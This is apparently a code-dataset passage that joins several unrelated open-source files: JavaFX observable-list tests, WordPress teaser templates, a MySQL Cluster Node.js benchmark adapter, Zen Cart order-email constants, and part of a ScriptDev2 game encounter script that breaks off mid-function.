list.subList(0, 1).add(null);
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_add_indexed() {
list.subList(0, 1).add(0, null);
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_addAll() {
list.subList(0, 1).addAll(Collections.<String>singleton(null));
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_addAll_indexed() {
list.subList(0, 1).addAll(0, Collections.<String>singleton(null));
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_set() {
list.subList(0, 1).set(0, null);
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_listIterator() {
list.subList(0, 1).listIterator().add(null);
}
@Test
public void testAdd() {
list.add("a");
assertSingleCall(new String[] {"a"}, new int[] {4,4});
}
@Test
public void testAdd_indexed() {
list.add(1, "a");
assertSingleCall(new String[] {"a"}, new int[] {1,1});
}
@Test
public void testAddAll() {
list.addAll("a", "b");
assertSingleCall(new String[] {"a", "b"}, new int[] {4,4});
}
@Test
public void testAddAll_indexed() {
list.addAll(1, Arrays.asList("a", "b"));
assertSingleCall(new String[] {"a", "b"}, new int[] {1,1});
}
@Test
public void testClear() {
list.clear();
assertSingleCall(new String[0], new int[] {0,4});
}
@Test
public void testRemove() {
list.remove("bar");
assertSingleCall(new String[0], new int[] {1,2});
}
@Test
public void testRemove_indexed() {
list.remove(0);
assertSingleCall(new String[0], new int[] {0,1});
}
@Test
public void testRemoveAll() {
list.removeAll(Arrays.asList("bar", "eggs", "foobar"));
assertSingleCall(new String[0], new int[] {1,2,3,4});
}
@Test
public void testRetainAll() {
list.retainAll(Arrays.asList("foo", "barfoo", "ham"));
assertSingleCall(new String[0], new int[] {1,2,3,4});
}
@Test
public void testSet() {
list.set(1, "foobar");
assertSingleCall(new String[] {"foobar"}, new int[] {1,2});
}
@Test
public void testSetAll() {
list.setAll("a", "b");
assertSingleCall(new String[] {"a", "b"}, new int[] {0, 4});
}
@Test
public void testIterator_remove() {
final Iterator<String> iterator = list.iterator();
iterator.next();
iterator.remove();
assertSingleCall(new String[0], new int[] {0,1});
}
@Test
public void testListIterator_add() {
list.listIterator().add("a");
assertSingleCall(new String[] {"a"}, new int[] {0,0});
}
@Test
public void testListIterator_set() {
final ListIterator<String> listIterator = list.listIterator();
listIterator.next();
listIterator.set("a");
assertSingleCall(new String[] {"a"}, new int[] {0,1});
}
@Test
public void testSubList_add() {
list.subList(0, 1).add("b");
assertSingleCall(new String[] {"b"}, new int[] {1,1});
}
@Test
public void testSubList_addAll() {
list.subList(0, 1).addAll(Arrays.asList("a", "b"));
assertSingleCall(new String[] {"a", "b"}, new int[] {1,1});
}
@Test
public void testSubList_clear() {
list.subList(0, 1).clear();
assertSingleCall(new String[0], new int[] {0, 1});
}
@Test
public void testSubList_remove() {
list.subList(0, 1).remove(0);
assertSingleCall(new String[0], new int[] {0, 1});
}
@Test
public void testSubList_removeAll() {
list.subList(0, 1).removeAll(Arrays.asList("foo", "bar"));
assertSingleCall(new String[0], new int[] {0, 1});
}
@Test
public void testSubList_retainAll() {
    // retainAll() with a superset keeps every element of the sublist view, so
    // no structural change happens and no veto callback may be recorded.
    list.subList(0, 1).retainAll(Arrays.asList("foo", "bar"));
    // Was a bare Java 'assert', which is a no-op unless the JVM runs with -ea
    // and would let a regression pass silently; use a JUnit assertion instead.
    org.junit.Assert.assertTrue(calls.isEmpty());
}
@Test
public void testSubList_set() {
list.subList(0, 1).set(0, "a");
assertSingleCall(new String[] {"a"}, new int[] {0,1});
}
@Test
public void testSubList_iterator_quicktest() {
// Exercises remove/add/set through a sublist's list-iterator in sequence and
// checks that each mutation produced exactly one recorded veto call with the
// expected changed elements and index range.
final ListIterator<String> iterator = list.subList(0, 1).listIterator();
iterator.next();
iterator.remove();
iterator.add("a");
iterator.previous();
iterator.set("b");
assertCallCount(3);
// call 0: removal of the element at [0,1); call 1: insertion of "a" at 0;
// call 2: replacement by "b" at [0,1)
assertCall(0, new String[0], new int[] {0, 1});
assertCall(1, new String[] {"a"}, new int[] {0, 0});
assertCall(2, new String[] {"b"}, new int[] {0, 1});
}
@Test
public void testConcurrencyAdd() {
    // Take a sublist view, then structurally modify the backing list so the
    // view becomes stale. (Removed the unused local 'boolean exception'.)
    List<String> sub = list.subList(0, 1);
    list.add("x");
    assertCallCount(1);
    try {
        sub.add("y");
        fail();
    } catch (ConcurrentModificationException e) {
        // expected: the stale sublist must reject the structural change
    }
    // the rejected add must not have fired an additional veto callback
    assertCallCount(1);
}
@Test
public void testConcurrencyAddAll() {
    // Direct modification of the backing list invalidates the sublist view.
    // (Removed the unused local 'boolean exception'.)
    List<String> sub = list.subList(0, 1);
    list.add("x");
    assertCallCount(1);
    try {
        sub.addAll(Arrays.asList("y", "z"));
        fail();
    } catch (ConcurrentModificationException e) {
        // expected
    }
    // the rejected addAll must not have fired another veto callback
    assertCallCount(1);
}
@Test
public void testConcurrencyClear() {
    // clear() on a stale sublist must fail fast without notifying listeners.
    // (Removed the unused local 'boolean exception'.)
    List<String> sub = list.subList(0, 1);
    list.add("x");
    assertCallCount(1);
    try {
        sub.clear();
        fail();
    } catch (ConcurrentModificationException e) {
        // expected
    }
    assertCallCount(1);
}
@Test
public void testConcurrencyRemove() {
    // remove(Object) through a stale sublist must throw and fire no callback.
    // (Removed the unused local 'boolean exception'.)
    List<String> sub = list.subList(0, 1);
    list.add("x");
    assertCallCount(1);
    try {
        sub.remove("foo");
        fail();
    } catch (ConcurrentModificationException e) {
        // expected
    }
    assertCallCount(1);
}
@Test
public void testConcurrencyRemoveAll() {
    // removeAll() through a stale sublist must throw and fire no callback.
    // (Removed the unused local 'boolean exception'.)
    List<String> sub = list.subList(0, 1);
    list.add("x");
    assertCallCount(1);
    try {
        sub.removeAll(Arrays.asList("x"));
        fail();
    } catch (ConcurrentModificationException e) {
        // expected
    }
    assertCallCount(1);
}
@Test
public void testConcurrencyRetainAll() {
    // retainAll() through a stale sublist must throw and fire no callback.
    // (Removed the unused local 'boolean exception'.)
    List<String> sub = list.subList(0, 1);
    list.add("x");
    assertCallCount(1);
    try {
        sub.retainAll(Arrays.asList("x"));
        fail();
    } catch (ConcurrentModificationException e) {
        // expected
    }
    assertCallCount(1);
}
@Test
public void testConcurrencySet() {
    // set() through a stale sublist must throw and fire no callback.
    // (Removed the unused local 'boolean exception'.)
    List<String> sub = list.subList(0, 1);
    list.add("x");
    assertCallCount(1);
    try {
        sub.set(0, "z");
        fail();
    } catch (ConcurrentModificationException e) {
        // expected
    }
    assertCallCount(1);
}
@Test
public void testConcurrencyIteratorRemove() {
    // Invalidate an open iterator by mutating the list directly, then attempt
    // a removal through it. (Removed the unused local 'boolean exception'.)
    ListIterator<String> it = list.listIterator();
    it.next();
    list.add("x");
    assertCallCount(1);
    try {
        it.remove();
    } catch (ConcurrentModificationException e) {
        // expected
    }
    // NOTE(review): unlike the sublist tests above there is no fail() here,
    // but the call-count check still catches a remove() that went through.
    assertCallCount(1);
}
@Test
public void testConcurrencyIteratorAdd() {
    // Invalidate an open iterator by mutating the list directly, then attempt
    // an insertion through it. (Removed the unused local 'boolean exception'.)
    ListIterator<String> it = list.listIterator();
    it.next();
    list.add("x");
    assertCallCount(1);
    try {
        it.add("g");
    } catch (ConcurrentModificationException e) {
        // expected
    }
    // an add() that sneaked through would have raised the callback count
    assertCallCount(1);
}
@Test
public void testConcurrencyIteratorSet() {
    // Invalidate an open iterator by mutating the list directly, then attempt
    // a replacement through it. (Removed the unused local 'boolean exception'.)
    ListIterator<String> it = list.listIterator();
    it.next();
    list.add("x");
    assertCallCount(1);
    try {
        it.set("p");
    } catch (ConcurrentModificationException e) {
        // expected
    }
    // a set() that sneaked through would have raised the callback count
    assertCallCount(1);
}
@Test(expected=ConcurrentModificationException.class)
public void testConcurrencyIteratorIterator() {
// Two independent iterators over the same list: the first remove() succeeds
// and structurally modifies the list, so the second iterator's remove() must
// fail fast with the expected ConcurrentModificationException.
ListIterator<String> it1 = list.listIterator();
ListIterator<String> it2 = list.listIterator();
it1.next();
it2.next();
it1.remove();
it2.remove();
}
@Test
public void testNonConcurrency() {
// A single iterator may interleave remove/add/set freely: every mutation goes
// through the iterator itself, so it never observes a concurrent modification
// and no exception may be thrown.
ListIterator<String> it = list.listIterator();
it.next();
it.remove();
it.next();
it.remove();
it.add("foo");
it.add("bar");
it.previous();
it.set("foobar");
}
@Test
public void testSubListCreatedOnChangeValid() {
// Regression test: a sublist created from inside a ListChangeListener (i.e.
// while a change is being fired) must remain usable afterwards. Each mutation
// below must fire exactly one change, and the sublist captured during that
// change must not throw when accessed.
final List<List<? extends String>> subLists = new ArrayList<>();
list.addListener((ListChangeListener<String>) c -> {
subLists.add(c.getList().subList(0, 1));
});
list.add("abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.add(0, "abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.addAll(0, Arrays.asList("abc", "bcd"));
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.addAll(Arrays.asList("abc", "bcd"));
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.remove(0);
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.remove("abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.removeAll("abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.retainAll("bcd");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
// NOTE(review): unlike every other mutation in this test, setAll() is not
// followed by assertEquals/size checks — presumably an oversight; confirm
// whether setAll() here fires a change the listener should have recorded.
list.setAll("foo", "bar", "ham", "eggs");
subLists.clear();
list.subList(0, 2).add("a");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.subList(0, 2).remove(0);
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
Iterator<String> it = list.iterator();
it.next();
it.remove();
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.listIterator().add("abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
}
}
| teamfx/openjfx-8u-dev-rt | modules/base/src/test/java/javafx/collections/VetoableObservableListTest.java | Java | gpl-2.0 | 15,865 |
<script type="text/html" id="vc_teaser-button">
<div class="vc_teaser-checkbox">
<label class="vc_teaser-button-label vc_teaser-label-{{ value }}"><input
class="vc_teaser-button vc_teaser-btn-{{ value }}" type="checkbox" value="{{value}}">
<span>{{label}}</span></label>
</div>
</script>
<script type="text/html" id="vc_teaser-title">
<div class="vc_teaser-control vc_teaser-ctr-{{ name }}" data-control="{{ name }}" id="vc_teaser-title-control">
<div class="vc_move"></div>
<span></span>
<div class="vc_link-controls">
<?php _e( 'Link to', LANGUAGE_ZONE ) ?>: <a href="#"
class="vc_link-control{{ link === 'none' ? ' vc_active-link' : ''}}"
data-link="none"><?php _e( 'No link', LANGUAGE_ZONE ) ?></a>
| <a href="#" class="vc_link-control{{ link === 'post' ? ' vc_active-link' : ''}}"
data-link="post"><?php _e( 'On post', LANGUAGE_ZONE ) ?></a>
| <a href="#" class="vc_link-control{{ link === 'big_image' ? ' vc_active-link' : ''}}"
data-link="big_image"><?php _e( 'Big image', LANGUAGE_ZONE ) ?></a>
</div>
</div>
</script>
<script type="text/html" id="vc_teaser-image">
<div class="vc_teaser-control vc_teaser-ctr-{{ name }}" data-control="{{ name }}" id="vc_teaser-image-control">
<div class="vc_move"></div>
<div class="vc_buttons">
<a href="#" class="vc_teaser-image-featured"
data-mode="featured"><?php _e( 'Featured', LANGUAGE_ZONE ) ?></a> |
<a href="#" class="vc_teaser-image-custom" data-mode="custom"><?php _e( 'Custom', LANGUAGE_ZONE ) ?></a>
</div>
<div class="vc_image">
</div>
<div class="vc_link-controls">
<?php _e( 'Link to', LANGUAGE_ZONE ) ?>: <a href="#"
class="vc_link-control{{ link === 'none' ? ' vc_active-link' : ''}}"
data-link="none"><?php _e( 'No link', LANGUAGE_ZONE ) ?></a>
| <a href="#" class="vc_link-control{{ link === 'post' ? ' vc_active-link' : ''}}"
data-link="post"><?php _e( 'On post', LANGUAGE_ZONE ) ?></a>
| <a href="#" class="vc_link-control{{ link === 'big_image' ? ' vc_active-link' : ''}}"
data-link="big_image"><?php _e( 'Big image', LANGUAGE_ZONE ) ?></a>
</div>
</div>
</script>
<script type="text/html" id="vc_teaser-text">
<div class="vc_teaser-control vc_teaser-ctr-{{ name }}" data-control="{{ name }}" id="vc_teaser-text-control">
<div class="vc_move"></div>
<div class="vc_buttons">
<a href="#" class="vc_teaser-text-excerpt vc_teaser-text-control"
data-mode="excerpt"><?php _e( 'Excerpt', LANGUAGE_ZONE ) ?></a> |
<a href="#" class="vc_teaser-text-text vc_teaser-text-control"
data-mode="text"><?php _e( 'Text', LANGUAGE_ZONE ) ?></a> |
<a href="#" class="vc_teaser-text-custom vc_teaser-text-control"
data-mode="custom"><?php _e( 'Custom', LANGUAGE_ZONE ) ?></a>
</div>
<div class="vc_text">
</div>
</div>
</script>
<script type="text/html" id="vc_teaser-link">
<div class="vc_teaser-control vc_teaser-ctr-{{ name }}" data-control="{{ name }}" id="vc_teaser-link-control">
<div class="vc_move"></div>
<a href="#"><?php _e( 'Read more', LANGUAGE_ZONE ) ?></a>
</div>
</script>
<script type="text/html" id="vc_teaser-custom-image-block">
<div class="vc_custom">
<div class="vc_teaser-custom-image-view">
</div>
<a class="vc_teaser_add_custom_image" href="#"
title="<?php _e( 'Add custom image', LANGUAGE_ZONE ) ?>"><?php _e( 'Add custom image', LANGUAGE_ZONE ) ?></a>
</div>
</script>
<script type="text/html" id="vc_teaser-custom-image">
<a href="#" class="vc_teaser_add_custom_image" style="width: 266px; text-align: center;">
<img rel="<%= id %>" src="<%= url %>"/>
</a>
</script> | wiljenum/wordpress-jo | wp-content/themes/dt-the7/wpbakery/js_composer/include/templates/teaser.html.php | PHP | gpl-2.0 | 3,650 |
/*
Copyright (c) 2013, Oracle and/or its affiliates. All rights
reserved.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License, version 2.0,
as published by the Free Software Foundation.
This program is also distributed with certain software (including
but not limited to OpenSSL) that is licensed under separate terms,
as designated in a particular file or component or in included license
documentation. The authors of MySQL hereby grant you an additional
permission to link the program and your derivative works with the
separately licensed software that they have included with MySQL.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License, version 2.0, for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
02110-1301 USA
*/
'use strict';
var spi = require('../Adapter/impl/SPI.js'),
dbt_module = require('../Adapter/impl/common/DBTableHandler.js'),
DBTableHandler = dbt_module.DBTableHandler,
unified_debug = require('../Adapter/api/unified_debug.js'),
udebug = unified_debug.getLogger('jscrund_dbspi.js');
// SPI-level backend for the jscrund benchmark: talks directly to the database
// service provider (DBConnectionPool / DBSession) instead of the user API.
function implementation() {
};
implementation.prototype = {
dbServiceProvider : null,  // SPI module chosen by getDefaultProperties()
dbConnPool : null,         // connection pool obtained in initialize()
dbSession : null,          // single session used for all operations
inBatchMode : false,       // true between createBatch() and executeBatch()
operations : null          // queued operations while in batch mode
};
// Resolve the SPI backend for the named adapter, remember it for connect(),
// and hand back that backend's default connection properties.
implementation.prototype.getDefaultProperties = function(adapter) {
  var provider = spi.getDBServiceProvider(adapter);
  this.dbServiceProvider = provider;
  return provider.getDefaultConnectionProperties();
};
// Shut down in order: close the session first, then the pool; the caller's
// callback fires when the pool close completes.
implementation.prototype.close = function(callback) {
  var self = this;
  self.dbSession.close(function onSessionClosed() {
    self.dbConnPool.close(callback);
  });
};
// Connect to the database, open one DBSession, and build a DBTableHandler for
// every mapped constructor in options.annotations. Calls back with null on
// success or the first connect/session error.
implementation.prototype.initialize = function(options, callback) {
udebug.log("initialize");
var impl = this;
var mappings = options.annotations;
var nmappings = mappings.length;  // countdown of outstanding metadata fetches
// Fetch table metadata for mapping n and attach the resulting handler.
function getMapping(n) {
// NOTE(review): 'err' from getTableMetadata is silently ignored here; a
// failed fetch would leave nmappings > 0 and the callback never firing.
function gotMapping(err, tableMetadata) {
udebug.log("gotMapping", n);
nmappings--;
var dbt = new DBTableHandler(tableMetadata, mappings[n].prototype.mynode.mapping,
mappings[n]);
udebug.log("Got DBTableHandler", dbt);
mappings[n].dbt = dbt;
if(nmappings == 0) {
callback(null); /* All done */
}
}
impl.dbConnPool.getTableMetadata(options.properties.database,
mappings[n].prototype.mynode.mapping.table,
impl.dbSession, gotMapping);
}
// Step 2: session is open; kick off all metadata fetches in parallel.
function onDbSession(err, dbSession) {
var n;
if(err) { callback(err, null); }
else {
impl.dbSession = dbSession;
if(mappings.length) {
for(n = 0 ; n < mappings.length ; n++) { getMapping(n); }
}
else {
callback(null);
}
}
}
// Step 1: pool is connected; request a single session (id 1).
function onConnect(err, dbConnectionPool) {
impl.dbConnPool = dbConnectionPool;
if(err) { callback(err, null); }
else {
dbConnectionPool.getDBSession(1, onDbSession);
}
}
impl.dbServiceProvider.connect(options.properties, onConnect);
};
// Queue the operation while in batch mode; otherwise execute it immediately
// in its own single-operation transaction. The 'callback' parameter is unused
// here — completion is delivered through the callback already bound into the
// operation by its build*Operation() call. 'row' is only used for error logs.
implementation.prototype.execOneOperation = function(op, tx, callback, row) {
if(this.inBatchMode) {
this.operations.push(op);
}
else {
tx.execute([op], function(err) { if(err) console.log("TX EXECUTE ERR:", err, row); });
}
};
// Insert parameters.object into its mapped table: build an insert operation
// against the object's DBTableHandler, then queue or execute it.
implementation.prototype.persist = function(parameters, callback) {
  udebug.log_detail('persist object:', parameters.object);
  var object = parameters.object;
  var tableHandler = object.constructor.dbt;
  var txHandler = this.dbSession.getTransactionHandler();
  var insertOp = this.dbSession.buildInsertOperation(tableHandler, object, txHandler, callback);
  this.execOneOperation(insertOp, txHandler, callback, object);
};
// Primary-key read: resolve the unique index handler for parameters.key and
// issue a read operation, queued or immediate depending on batch mode.
implementation.prototype.find = function(parameters, callback) {
  udebug.log_detail('find key:', parameters.key);
  var key = parameters.key;
  var tableHandler = parameters.object.constructor.dbt;
  var txHandler = this.dbSession.getTransactionHandler();
  var indexHandler = tableHandler.getIndexHandler(key, true);
  var readOp = this.dbSession.buildReadOperation(indexHandler, key, txHandler, callback);
  this.execOneOperation(readOp, txHandler, callback);
};
// Primary-key delete: resolve the unique index handler for parameters.key and
// issue a delete operation, queued or immediate depending on batch mode.
implementation.prototype.remove = function(parameters, callback) {
  udebug.log_detail('remove key:', parameters.key);
  var key = parameters.key;
  var tableHandler = parameters.object.constructor.dbt;
  var txHandler = this.dbSession.getTransactionHandler();
  var indexHandler = tableHandler.getIndexHandler(key, true);
  var deleteOp = this.dbSession.buildDeleteOperation(indexHandler, key, txHandler, callback);
  this.execOneOperation(deleteOp, txHandler, callback);
};
// Enter batch mode: subsequent operations are collected in this.operations
// until executeBatch() flushes them.
implementation.prototype.createBatch = function(callback) {
  udebug.log_detail('createBatch');
  this.inBatchMode = true;
  this.operations = [];
  callback(null);
};
// Leave batch mode and execute every queued operation in one transaction;
// the caller's callback fires when the whole batch completes.
implementation.prototype.executeBatch = function(callback) {
  udebug.log_detail('executeBatch');
  this.inBatchMode = false;
  var queued = this.operations;
  this.dbSession.getTransactionHandler().execute(queued, callback);
};
// Open an explicit transaction. dbSession.begin() returns synchronously, so
// the callback is invoked immediately with no error.
implementation.prototype.begin = function(callback) {
  udebug.log_detail('begin');
  this.dbSession.begin();
  callback(null);
};
// Commit the open transaction; the session invokes the callback on completion.
implementation.prototype.commit = function(callback) {
  udebug.log_detail('commit');
  this.dbSession.commit(callback);
};
exports.implementation = implementation;
| greenlion/mysql-server | storage/ndb/nodejs/perftest/jscrund_dbspi.js | JavaScript | gpl-2.0 | 5,523 |
<?php
/**
* Constants used by the zen_update_orders_history function.
*
* @copyright Copyright 2003-2020 Zen Cart Development Team
* @copyright Portions Copyright 2003 osCommerce
* @license http://www.zen-cart.com/license/2_0.txt GNU Public License V2.0
* @version $Id: Steve 2020 May 27 Modified in v1.5.7 $
*/
// Visual divider used between sections of the status-update email body.
define('OSH_EMAIL_SEPARATOR', '------------------------------------------------------');
// Subject line and field labels of the order-status email.
define('OSH_EMAIL_TEXT_SUBJECT', 'Order Update');
define('OSH_EMAIL_TEXT_ORDER_NUMBER', 'Order Number:');
define('OSH_EMAIL_TEXT_INVOICE_URL', 'Order Details:');
define('OSH_EMAIL_TEXT_DATE_ORDERED', 'Date Ordered:');
define('OSH_EMAIL_TEXT_COMMENTS_UPDATE', '<em>The comments for your order are: </em>');
// Status section variants: chosen depending on whether the status changed.
define('OSH_EMAIL_TEXT_STATUS_UPDATED', 'Your order\'s status has been updated:' . "\n");
define('OSH_EMAIL_TEXT_STATUS_NO_CHANGE', 'Your order\'s status has not changed:' . "\n");
// sprintf() templates: %s placeholders are filled with status names.
define('OSH_EMAIL_TEXT_STATUS_LABEL', '<strong>Current status: </strong> %s' . "\n\n");
define('OSH_EMAIL_TEXT_STATUS_CHANGE', '<strong>Old status:</strong> %1$s, <strong>New status:</strong> %2$s' . "\n\n");
define('OSH_EMAIL_TEXT_STATUS_PLEASE_REPLY', 'Please reply to this email if you have any questions.' . "\n");
| barco57/zencart | admin/includes/languages/english/extra_definitions/orders_status_updates_admin.php | PHP | gpl-2.0 | 1,214 |
/* Copyright (C) 2006 - 2008 ScriptDev2 <https://scriptdev2.svn.sourceforge.net/>
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
/* ScriptData
SDName: Arcatraz
SD%Complete: 60
SDComment: Warden Mellichar, event controller for Skyriss event. Millhouse Manastorm. TODO: make better combatAI for Millhouse.
SDCategory: Tempest Keep, The Arcatraz
EndScriptData */
/* ContentData
npc_millhouse_manastorm
npc_warden_mellichar
mob_zerekethvoidzone
EndContentData */
#include "ScriptPCH.h"
#include "arcatraz.h"
/*#####
# npc_millhouse_manastorm
#####*/
#define SAY_INTRO_1 -1552010
#define SAY_INTRO_2 -1552011
#define SAY_WATER -1552012
#define SAY_BUFFS -1552013
#define SAY_DRINK -1552014
#define SAY_READY -1552015
#define SAY_KILL_1 -1552016
#define SAY_KILL_2 -1552017
#define SAY_PYRO -1552018
#define SAY_ICEBLOCK -1552019
#define SAY_LOWHP -1552020
#define SAY_DEATH -1552021
#define SAY_COMPLETE -1552022
#define SPELL_CONJURE_WATER 36879
#define SPELL_ARCANE_INTELLECT 36880
#define SPELL_ICE_ARMOR 36881
#define SPELL_ARCANE_MISSILES 33833
#define SPELL_CONE_OF_COLD 12611
#define SPELL_FIRE_BLAST 13341
#define SPELL_FIREBALL 14034
#define SPELL_FROSTBOLT 15497
#define SPELL_PYROBLAST 33975
// AI for Millhouse Manastorm, the gnome prisoner freed during the Warden
// Mellichar event. Plays a timed 7-phase intro monologue, then fights with
// fire spells. Intro is skipped if the instance already marks his cell done.
struct npc_millhouse_manastormAI : public ScriptedAI
{
npc_millhouse_manastormAI(Creature *c) : ScriptedAI(c)
{
pInstance = c->GetInstanceData();
}
ScriptedInstance* pInstance;
uint32 EventProgress_Timer; // countdown until the next intro phase
uint32 Phase;               // current intro phase, 1..7
bool Init;                  // true once the intro has completed (or was skipped)
bool LowHp;                 // ensures the low-health yell fires only once
uint32 Pyroblast_Timer;
uint32 Fireball_Timer;
void Reset()
{
EventProgress_Timer = 2000;
LowHp = false;
Init = false;
Phase = 1;
Pyroblast_Timer = 1000;
Fireball_Timer = 2500;
if (pInstance)
{
// skip the intro if the Beta cell event already finished
if (pInstance->GetData(TYPE_WARDEN_2) == DONE)
Init = true;
if (pInstance->GetData(TYPE_HARBINGERSKYRISS) == DONE)
{
DoScriptText(SAY_COMPLETE, me);
}
}
}
// Caster-style chase: keeps 25 yd distance instead of closing to melee.
void AttackStart(Unit* pWho)
{
if (me->Attack(pWho, true))
{
me->AddThreat(pWho, 0.0f);
me->SetInCombatWith(pWho);
pWho->SetInCombatWith(me);
me->GetMotionMaster()->MoveChase(pWho, 25.0f);
}
}
void EnterCombat(Unit *who)
{
}
void KilledUnit(Unit *victim)
{
switch(rand()%2)
{
case 0: DoScriptText(SAY_KILL_1, me); break;
case 1: DoScriptText(SAY_KILL_2, me); break;
}
}
void JustDied(Unit *victim)
{
DoScriptText(SAY_DEATH, me);
/*for questId 10886 (heroic mode only)
if (pInstance && pInstance->GetData(TYPE_HARBINGERSKYRISS) != DONE)
->FailQuest();*/
}
void UpdateAI(const uint32 diff)
{
// Intro state machine: advance one phase each time the timer elapses,
// until phase 7 marks TYPE_WARDEN_2 done and flips Init.
if (!Init)
{
if (EventProgress_Timer <= diff)
{
if (Phase < 8)
{
switch(Phase)
{
case 1:
DoScriptText(SAY_INTRO_1, me);
EventProgress_Timer = 18000;
break;
case 2:
DoScriptText(SAY_INTRO_2, me);
EventProgress_Timer = 18000;
break;
case 3:
DoScriptText(SAY_WATER, me);
DoCast(me,SPELL_CONJURE_WATER);
EventProgress_Timer = 7000;
break;
case 4:
DoScriptText(SAY_BUFFS, me);
DoCast(me,SPELL_ICE_ARMOR);
EventProgress_Timer = 7000;
break;
case 5:
DoScriptText(SAY_DRINK, me);
DoCast(me,SPELL_ARCANE_INTELLECT);
EventProgress_Timer = 7000;
break;
case 6:
DoScriptText(SAY_READY, me);
EventProgress_Timer = 6000;
break;
case 7:
if (pInstance)
pInstance->SetData(TYPE_WARDEN_2,DONE);
Init = true;
break;
}
++Phase;
}
} else EventProgress_Timer -= diff;
}
if (!UpdateVictim())
return;
// one-shot warning when he drops below 20% health
if (!LowHp && ((me->GetHealth()*100 / me->GetMaxHealth()) < 20))
{
DoScriptText(SAY_LOWHP, me);
LowHp = true;
}
if (Pyroblast_Timer <= diff)
{
// don't clip an in-progress cast; retry next update instead
if (me->IsNonMeleeSpellCasted(false))
return;
DoScriptText(SAY_PYRO, me);
DoCast(me->getVictim(),SPELL_PYROBLAST);
Pyroblast_Timer = 40000;
} else Pyroblast_Timer -=diff;
if (Fireball_Timer <= diff)
{
DoCast(me->getVictim(),SPELL_FIREBALL);
Fireball_Timer = 4000;
} else Fireball_Timer -=diff;
DoMeleeAttackIfReady();
}
};
// Factory hook used by the script registry: build Millhouse's AI instance.
CreatureAI* GetAI_npc_millhouse_manastorm(Creature* pCreature)
{
    return new npc_millhouse_manastormAI(pCreature);
}
/*#####
# npc_warden_mellichar
#####*/
#define YELL_INTRO1 -1552023
#define YELL_INTRO2 -1552024
#define YELL_RELEASE1 -1552025
#define YELL_RELEASE2A -1552026
#define YELL_RELEASE2B -1552027
#define YELL_RELEASE3 -1552028
#define YELL_RELEASE4 -1552029
#define YELL_WELCOME -1552030
//phase 2(acid mobs)
#define ENTRY_TRICKSTER 20905
#define ENTRY_PH_HUNTER 20906
//phase 3
#define ENTRY_MILLHOUSE 20977
//phase 4(acid mobs)
#define ENTRY_AKKIRIS 20908
#define ENTRY_SULFURON 20909
//phase 5(acid mobs)
#define ENTRY_TW_DRAK 20910
#define ENTRY_BL_DRAK 20911
//phase 6
#define ENTRY_SKYRISS 20912
//TARGET_SCRIPT
#define SPELL_TARGET_ALPHA 36856
#define SPELL_TARGET_BETA 36854
#define SPELL_TARGET_DELTA 36857
#define SPELL_TARGET_GAMMA 36858
#define SPELL_TARGET_OMEGA 36852
#define SPELL_BUBBLE_VISUAL 36849
// Event controller for the Harbinger Skyriss encounter: Warden Mellichar
// opens the prison cells one phase at a time. Each phase (a) waits for the
// previous cell's boss to be DONE (CanProgress), (b) beams the next pod and
// flags the cell IN_PROGRESS (DoPrepareForPhase), then (c) summons the
// cell's occupant once EventProgress_Timer elapses (CanSpawn branch).
struct npc_warden_mellicharAI : public ScriptedAI
{
npc_warden_mellicharAI(Creature *c) : ScriptedAI(c)
{
pInstance = c->GetInstanceData();
}
ScriptedInstance* pInstance;
bool IsRunning;             // event started (player walked into range)
bool CanSpawn;              // a pod has been beamed; summon on next timer tick
uint32 EventProgress_Timer; // delay before the prepared phase spawns its boss
uint32 Phase;               // next cell to open, 1..7 (7 = Skyriss)
void Reset()
{
IsRunning = false;
CanSpawn = false;
EventProgress_Timer = 22000;
Phase = 1;
me->SetFlag(UNIT_FIELD_FLAGS,UNIT_FLAG_NON_ATTACKABLE);
DoCast(me,SPELL_TARGET_OMEGA);
if (pInstance)
pInstance->SetData(TYPE_HARBINGERSKYRISS,NOT_STARTED);
}
// The warden never fights himself; attacks are ignored.
void AttackStart(Unit* who) { }
// Starts the event when a hostile player gets close enough and in LoS.
void MoveInLineOfSight(Unit *who)
{
if (IsRunning)
return;
if (!me->getVictim() && who->isTargetableForAttack() && (me->IsHostileTo(who)) && who->isInAccessiblePlaceFor (me))
{
if (!me->canFly() && me->GetDistanceZ(who) > CREATURE_Z_ATTACK_RANGE)
return;
if (who->GetTypeId() != TYPEID_PLAYER)
return;
// aggro at one tenth of the normal aggro distance
